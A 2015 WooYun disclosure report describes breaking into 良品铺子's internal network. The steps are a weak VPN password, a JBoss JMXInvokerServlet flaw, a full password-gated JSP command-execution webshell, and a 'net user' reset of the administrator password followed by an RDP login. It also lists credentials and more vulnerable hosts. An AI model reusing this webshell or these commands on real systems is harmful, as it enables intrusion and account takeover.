当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115403

漏洞标题:良品铺子内网漫游内网命令执行拿下内网shell

相关厂商:良品铺子

漏洞作者: 鸟云厂商

提交时间:2015-05-21 20:24

修复时间:2015-07-06 09:32

公开时间:2015-07-06 09:32

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-21: 细节已通知厂商并且等待厂商处理中
2015-05-22: 厂商已经确认,细节仅向厂商公开
2015-06-01: 细节向核心白帽子及相关领域专家公开
2015-06-11: 细节向普通白帽子公开
2015-06-21: 细节向实习白帽子公开
2015-07-06: 细节向公众公开

简要描述:

良品铺子内网漫游-内网命令执行-拿下内网shell

详细说明:

看漏洞的时候看到了良品铺子
顺手挖一挖
#1 首先找到了VPN入口
https://vpn.lppz.com
sangfor VPN
猜到弱口令:test/test,已经修改为test/Wooyunniao1
进入内网

屏幕快照 2015-05-21 下午7.43.45.png


#2 随手翻了翻内网系统
发现http://192.168.32.145:8080存在Jboss的JMXInvokerServlet漏洞
远程写了各种文件到服务器上,最后都解析错误,猜测服务器有安全防护相关的软件

屏幕快照 2015-05-21 下午7.47.51.png


于是换个姿势
写入:

<%
if("wooyun".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>


然后执行命令修改administrator的密码,原意是想添加用户,但是添加的用户无法登陆。

http://192.168.32.145:8080/niao/index.jsp?pwd=wooyun&i=net user administrator 123456


成功执行
mstsc.exe -u administrator -p 123456

屏幕快照 2015-05-21 下午7.53.50.png


屏幕快照 2015-05-21 下午7.54.11.png


屏幕快照 2015-05-21 下午7.54.20.png

漏洞证明:

各种内部文件啊

屏幕快照 2015-05-21 下午7.58.05.png


有东西在防着

屏幕快照 2015-05-21 下午7.54.38.png


修复方案:

http://192.168.32.9:8080
http://192.168.32.38:8080
http://192.168.32.40:8080
也存在该漏洞,不做过多检测

版权声明:转载请注明来源 鸟云厂商@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-22 09:31

厂商回复:

弱口令无敌啊。。多谢来搞。。。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-21 20:30 | 鸟云厂商 认证白帽子 ( 核心白帽子 | Rank:1313 漏洞数:146 | 中国菜鸟)

    感觉这辈子都没有办法让内网漫游打雷了

  2. 2015-05-21 20:32 | 帅克笛枫 ( 普通白帽子 | Rank:207 漏洞数:46 | 键盘只为不平而起落,鼠标亦会点到为止!)

    不出意外的话,厂商应该会忽略~~碰到过几次这家的bug了,

  3. 2015-05-22 10:49 | cuger ( 普通白帽子 | Rank:200 漏洞数:44 | 这个家伙很懒,什么也没留下)

    官网换了。。。。坑啊,手里还有之前官网的弱口令